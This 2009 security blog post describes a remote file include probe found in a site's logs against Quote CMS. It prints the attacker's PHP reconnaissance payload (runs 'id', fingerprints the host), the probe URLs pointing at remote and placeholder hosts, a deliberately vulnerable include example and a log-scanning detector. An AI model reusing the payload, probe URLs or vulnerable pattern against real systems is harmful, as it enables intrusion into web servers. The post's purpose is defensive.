SecGeeks Alert : Beware of Dangerous Remote File Include Vulnerabilities, Upgrade your web applications now!!

This weekend I had some free time and was going through the SecGeeks logs when I found this request:
http://www.secgeeks.com/admin/includes/themes/default/header.php?page_area=http://www..se/modules/mod_cblogin/id.txt

So what is this? First, look at the part of the URL that was requested on the SecGeeks site:
http://www.secgeeks.com/admin/includes/themes/default/header.php?page_area=

This is the request pattern for a remote file include vulnerability in Quote CMS:
http://secunia.com/advisories/30377
The point of a remote file include bug is that the attacker can make the vulnerable installation fetch and execute any file he can host; the script only has to append a URL to the parameter. In this case the file included was:
http://www..se/modules/mod_cblogin/id.txt
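To make the mechanism concrete, here is an added example (my own reconstruction, not Quote CMS's code or the advisory's text) of the kind of header.php that falls to the request above, next to a hardened version. The function names, the areas/ directory and the allowlist entries are assumptions for the demo.

```php
<?php
// Added example, not Quote CMS's own code: a hypothetical header.php showing the
// vulnerable pattern behind "header.php?page_area=http://.../id.txt", and a fix.
// Assumed layout: page fragments live under ./areas/<name>.php.

// VULNERABLE (hypothetical): the request parameter reaches include() untouched.
// When PHP may open URLs for include (allow_url_include=On, or allow_url_fopen=On
// on PHP before 5.2), "page_area=http://host/id.txt" makes the server download
// id.txt and run it as PHP with the web server's privileges.
function render_area_vulnerable(): void
{
    $area = $_GET['page_area'] ?? 'default';
    include $area;   // remote code execution; also local file include via ../
}

// HARDENED: the parameter only selects a key from a fixed allowlist; no part of
// the user-supplied string is ever used as a path or URL.
function render_area_safe(): void
{
    $allowed = [
        'default' => __DIR__ . '/areas/default.php',
        'sidebar' => __DIR__ . '/areas/sidebar.php',
        'footer'  => __DIR__ . '/areas/footer.php',
    ];
    $area = (string) ($_GET['page_area'] ?? 'default');
    if (!isset($allowed[$area])) {
        http_response_code(400);
        exit('unknown page area');
    }
    include $allowed[$area];
}

// Defence in depth, testable on its own: reject anything that carries a URL
// scheme or PHP stream wrapper before it gets near include()/require().
function is_safe_area_name(string $value): bool
{
    return (bool) preg_match('~^[A-Za-z0-9_-]{1,32}$~', $value);
}

render_area_safe();
```

Independently of the application fix, set `allow_url_include = Off` in php.ini (it is the default from PHP 5.2 on); with it off the include in the vulnerable function still fails for http:// and ftp:// targets, although path traversal to local files remains possible, which is why the allowlist is the real fix.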

So what does this file do? Visiting the URL returns the following PHP:

<?php
// Pretty-prints a byte count; the number of digits picks the unit.
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }

echo "";
// Fingerprint the host: kernel string, then run the shell command "id" to learn
// which user the web server executes PHP as. The bare constant id is sloppy, but
// PHP of the time treats an undefined constant as the string "id", so it works.
$un = @php_uname();
$id1 = system(id);
// Current working directory of the vulnerable script and the disk usage around it.
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

// Print everything into the HTTP response so the bot can scrape it; the marker
// string lets it confirm that the include really executed.
echo " was here ..";
echo "uname -a: $un";
echo "os: $os";
echo "id: $id1";
echo "free: $free";
echo "used: $used";
echo "total: $all";
// Stop here so the rest of the CMS page does not render after the payload.
exit;

It is clear that the script fingerprints the host: kernel and OS, the user the web server runs as (output of id), the current working directory and the disk space around it, and prints all of that into the HTTP response. That response is how the bot confirms the include worked and decides whether the box is worth coming back to with a real backdoor; in other cases I have seen the same details mailed to an address instead of printed.
So please check your systems and patch/update where necessary. This is not about one CMS: from my logs I can say it is definitely an automated bot that probes for file include vulnerabilities in many different CMSes, one URL pattern after another.
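The quickest check is the one that turned this up: look for requests whose query parameters carry a URL or PHP stream wrapper instead of a page name. The script below is an added example (mine, not from the original post) that scans combined-format access log lines for such probes; the four log lines embedded in it are constructed for the demo, with placeholder hostnames, and the 'HTTP/' and status-code parsing assumes the usual Apache/nginx combined format.

```php
<?php
// Added example, not from the original post: scan a combined-format access log
// for remote-file-include probes, i.e. any query parameter whose decoded value
// is itself a URL (http://, https://, ftp://, ...) or a PHP stream wrapper
// (php://input, data:, expect://). Run with: php rfi_scan.php < access.log
// The sample below is constructed for the demo; hosts are placeholders.

const SAMPLE_LOG = <<<'LOG'
203.0.113.7 - - [28/Jun/2009:23:41:02 +0000] "GET /admin/includes/themes/default/header.php?page_area=http://attacker.example/id.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.4 - - [28/Jun/2009:23:41:09 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Jun/2009:23:42:17 +0000] "GET /components/com_x/x.php?mosConfig_absolute_path=ftp%3A%2F%2Fattacker.example%2Fc.txt%3F HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
203.0.113.9 - - [28/Jun/2009:23:43:30 +0000] "GET /index.php?file=php://input HTTP/1.1" 200 99 "-" "curl/7.19"
LOG;

/** True when a decoded parameter value is a URL or stream wrapper rather than a page name. */
function is_remote_include_value(string $value): bool
{
    return (bool) preg_match('~^(?:[a-z][a-z0-9+.-]*://|data:)~i', ltrim($value));
}

/**
 * Parse combined-format log text and return one record per suspicious request:
 * client, path, parameter name, decoded value, HTTP status.
 */
function find_rfi_probes(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // client ident user [time] "METHOD target HTTP/x.y" status ...
        if (!preg_match('~^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})~', $line, $m)) {
            continue;
        }
        [, $client, $target, $status] = $m;
        $q = strpos($target, '?');
        if ($q === false) {
            continue;                       // no query string, nothing to include
        }
        $path  = substr($target, 0, $q);
        parse_str(substr($target, $q + 1), $params);   // also %-decodes values
        foreach ($params as $name => $value) {
            if (is_string($value) && is_remote_include_value($value)) {
                $hits[] = [
                    'client' => $client,
                    'path'   => $path,
                    'param'  => (string) $name,
                    'value'  => $value,
                    'status' => (int) $status,
                ];
            }
        }
    }
    return $hits;
}

$log = (PHP_SAPI === 'cli' && !posix_isatty(STDIN)) ? stream_get_contents(STDIN) : SAMPLE_LOG;
foreach (find_rfi_probes($log) as $h) {
    printf("%-15s %s %s=%s -> %d\n", $h['client'], $h['path'], $h['param'], $h['value'], $h['status']);
}
```

Three of the four constructed lines are reported: the header.php probe from this post, the URL-encoded ftp:// probe against a different component (parse_str decodes it, which is why the check runs on decoded values), and the php://input trick that needs no remote host at all. A 200 on such a request, as in the first line, deserves a closer look than a 404, but either way the scanner only tells you that someone tried; whether the include executed is what the id.txt output above would have revealed to the bot.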

Stay aware,Stay Secure.....
-SecGeek

from SecGeeks - information security, social security, vulnerabil on Mon, 29/06/2009 - 06:03